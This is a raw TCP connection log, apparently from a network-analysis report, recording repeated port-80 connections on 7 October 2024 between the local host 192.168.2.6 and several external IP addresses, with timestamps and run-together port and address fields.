                                                                                                                              Oct 7, 2024 12:34:33.201827049 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:33.201843023 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201863050 CEST8050008162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:33.201879025 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:33.201929092 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:34.101790905 CEST5000880192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.120858908 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.126061916 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.126123905 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.156199932 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.161061049 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712127924 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712145090 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712153912 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712225914 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712271929 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712282896 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712292910 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712301970 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712332010 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712660074 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712668896 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712677002 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712701082 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712718964 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.712822914 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:35.712861061 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.716001034 CEST5000980192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:34:35.720863104 CEST8050009162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:40.949526072 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:40.954458952 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:40.954530001 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:40.966978073 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:40.971982002 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.558974981 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.559026957 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.559097052 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:41.559108973 CEST8050010161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:41.559267044 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:42.478283882 CEST5001080192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.496710062 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.501863003 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:43.501944065 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.512648106 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:43.517571926 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.112163067 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.112292051 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.112473011 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:44.115614891 CEST8050011161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:44.115716934 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:45.023505926 CEST5001180192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.042411089 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.047708988 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.047904015 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.057806015 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:46.062962055 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.063189030 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.651693106 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.651757002 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.651788950 CEST8050012161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:46.654874086 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:47.570539951 CEST5001280192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.588679075 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.593934059 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:48.602351904 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.603678942 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:48.608473063 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205775023 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205941916 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205952883 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.205962896 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:49.206027031 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:49.206062078 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:49.210747004 CEST5001380192.168.2.6161.97.168.245
                                                                                                                              Oct 7, 2024 12:34:49.217426062 CEST8050013161.97.168.245192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.242186069 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:54.247157097 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.248400927 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:54.257118940 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:54.262069941 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.737018108 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:54.742279053 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:55.776695013 CEST5001480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:55.781739950 CEST80500143.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:56.793366909 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:56.798825026 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:56.799273014 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:56.810563087 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:56.815521955 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:57.262166977 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:57.262280941 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:58.320410013 CEST5001580192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:58.325429916 CEST80500153.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:59.343449116 CEST5001680192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:59.350725889 CEST80500163.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:59.350810051 CEST5001680192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:59.360426903 CEST5001680192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:34:59.367254019 CEST80500163.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:59.369528055 CEST80500163.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:59.817785025 CEST80500163.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:34:59.817848921 CEST5001680192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:00.867358923 CEST5001680192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:00.872603893 CEST80500163.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:02.046293020 CEST5001780192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:02.051523924 CEST80500173.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:02.051723957 CEST5001780192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:02.059458017 CEST5001780192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:02.064378977 CEST80500173.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:02.512428999 CEST80500173.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:02.512451887 CEST80500173.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:02.512578964 CEST5001780192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:02.517772913 CEST5001780192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:02.522640944 CEST80500173.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:07.544343948 CEST5001980192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:07.549424887 CEST80500193.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:07.549504042 CEST5001980192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:07.561130047 CEST5001980192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:07.566174030 CEST80500193.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:08.023444891 CEST80500193.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:08.027836084 CEST5001980192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:09.070447922 CEST5001980192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:09.075642109 CEST80500193.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:10.090445042 CEST5002080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:10.096276999 CEST80500203.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:10.102284908 CEST5002080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:10.107423067 CEST5002080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:10.113184929 CEST80500203.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:11.501279116 CEST80500203.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:11.501332045 CEST5002080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:11.617278099 CEST5002080192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:11.622220039 CEST80500203.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:12.638292074 CEST5002180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:12.643783092 CEST80500213.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:12.650293112 CEST5002180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:12.658299923 CEST5002180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:12.663152933 CEST80500213.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:12.663176060 CEST80500213.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:14.164268017 CEST5002180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:14.170202971 CEST80500213.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:14.170352936 CEST5002180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:15.187434912 CEST5002280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:15.192883015 CEST80500223.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:15.192965031 CEST5002280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:15.202512026 CEST5002280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:15.207607031 CEST80500223.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:15.652370930 CEST80500223.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:15.652436018 CEST80500223.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:15.652529001 CEST5002280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:15.655278921 CEST5002280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:15.660224915 CEST80500223.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:21.338433981 CEST5002380192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:21.343580008 CEST8050023209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:21.343656063 CEST5002380192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:21.363176107 CEST5002380192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:21.368473053 CEST8050023209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:21.938657999 CEST8050023209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:21.938705921 CEST8050023209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:21.946304083 CEST5002380192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:22.868469954 CEST5002380192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:23.887629032 CEST5002480192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:23.892700911 CEST8050024209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:23.892787933 CEST5002480192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:23.903409004 CEST5002480192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:23.908305883 CEST8050024209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:24.476787090 CEST8050024209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:24.476831913 CEST8050024209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:24.477025032 CEST5002480192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:25.414206982 CEST5002480192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:26.435417891 CEST5002580192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:26.625667095 CEST8050025209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:26.631408930 CEST5002580192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:26.643429041 CEST5002580192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:26.648389101 CEST8050025209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:26.648411989 CEST8050025209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:27.215451956 CEST8050025209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:27.215611935 CEST8050025209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:27.215647936 CEST5002580192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:28.151408911 CEST5002580192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:29.167373896 CEST5002680192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:29.172418118 CEST8050026209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:29.172482014 CEST5002680192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:29.182535887 CEST5002680192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:29.187414885 CEST8050026209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:29.758048058 CEST8050026209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:29.758223057 CEST8050026209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:29.758274078 CEST5002680192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:29.760392904 CEST5002680192.168.2.6209.74.64.190
                                                                                                                              Oct 7, 2024 12:35:29.765230894 CEST8050026209.74.64.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:34.889309883 CEST5002780192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:34.894239902 CEST805002768.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:34.895621061 CEST5002780192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:34.905025005 CEST5002780192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:34.910007954 CEST805002768.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:35.797230005 CEST805002768.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:35.797509909 CEST805002768.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:35.797681093 CEST5002780192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:36.414436102 CEST5002780192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:37.436727047 CEST5002880192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:37.441685915 CEST805002868.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:37.441746950 CEST5002880192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:37.460064888 CEST5002880192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:37.465178013 CEST805002868.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:38.347407103 CEST805002868.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:38.347645998 CEST805002868.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:38.348515034 CEST5002880192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:38.976836920 CEST5002880192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:39.998354912 CEST5002980192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:40.003429890 CEST805002968.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:40.011435032 CEST5002980192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:40.018347979 CEST5002980192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:40.023374081 CEST805002968.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:40.023402929 CEST805002968.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:40.914504051 CEST805002968.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:40.914793968 CEST805002968.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:40.922358990 CEST5002980192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:41.523691893 CEST5002980192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:42.542331934 CEST5003080192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:42.547743082 CEST805003068.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:42.550415993 CEST5003080192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:42.555382013 CEST5003080192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:42.560269117 CEST805003068.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:43.466133118 CEST805003068.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:43.466188908 CEST805003068.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:43.466280937 CEST5003080192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:43.471134901 CEST5003080192.168.2.668.178.233.113
                                                                                                                              Oct 7, 2024 12:35:43.476346970 CEST805003068.178.233.113192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:48.502873898 CEST5003180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:48.507858992 CEST80500313.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:48.515420914 CEST5003180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:48.519418001 CEST5003180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:48.524492025 CEST80500313.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:48.971592903 CEST80500313.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:48.971880913 CEST5003180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:50.027416945 CEST5003180192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:50.032608986 CEST80500313.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:51.042325020 CEST5003280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:51.047461033 CEST80500323.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:51.047532082 CEST5003280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:51.058733940 CEST5003280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:51.064189911 CEST80500323.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:52.445539951 CEST80500323.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:52.446393967 CEST5003280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:52.570719957 CEST5003280192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:52.575736046 CEST80500323.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:53.589526892 CEST5003380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:53.594691992 CEST80500333.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:53.594759941 CEST5003380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:53.605835915 CEST5003380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:53.610817909 CEST80500333.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:53.610876083 CEST80500333.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:54.067289114 CEST80500333.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:54.075073004 CEST5003380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:55.117361069 CEST5003380192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:55.122499943 CEST80500333.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:56.138339043 CEST5003480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:56.143353939 CEST80500343.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:56.150346041 CEST5003480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:56.154337883 CEST5003480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:56.159126043 CEST80500343.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:56.622138023 CEST80500343.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:56.622174025 CEST80500343.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:35:56.623410940 CEST5003480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:56.627405882 CEST5003480192.168.2.63.33.130.190
                                                                                                                              Oct 7, 2024 12:35:56.632412910 CEST80500343.33.130.190192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:10.148613930 CEST5003580192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:10.153615952 CEST805003538.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:10.154438972 CEST5003580192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:10.166371107 CEST5003580192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:10.171314955 CEST805003538.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:11.020119905 CEST805003538.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:11.020185947 CEST805003538.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:11.020257950 CEST5003580192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:11.665677071 CEST5003580192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:12.685343027 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:12.690623045 CEST805003638.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:12.694526911 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:12.705909967 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:12.710895061 CEST805003638.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:13.566414118 CEST805003638.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:13.566473007 CEST805003638.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:13.566533089 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:14.211416006 CEST5003680192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.229760885 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.234841108 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:15.234922886 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.245714903 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:15.251202106 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:15.252371073 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:16.072273970 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:16.072367907 CEST805003738.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:16.078392029 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:16.758392096 CEST5003780192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.776170969 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.781363964 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:17.781456947 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.787180901 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:17.792984009 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:18.630810022 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:18.630853891 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:18.635812044 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:18.638369083 CEST5003880192.168.2.638.55.251.233
                                                                                                                              Oct 7, 2024 12:36:18.643296957 CEST805003838.55.251.233192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:23.675977945 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:23.680988073 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:23.681056023 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:23.694304943 CEST5004080192.168.2.6162.0.215.33
                                                                                                                              Oct 7, 2024 12:36:23.699484110 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.285926104 CEST8050040162.0.215.33192.168.2.6
                                                                                                                              Oct 7, 2024 12:36:24.285974979 CEST8050040162.0.215.33192.168.2.6
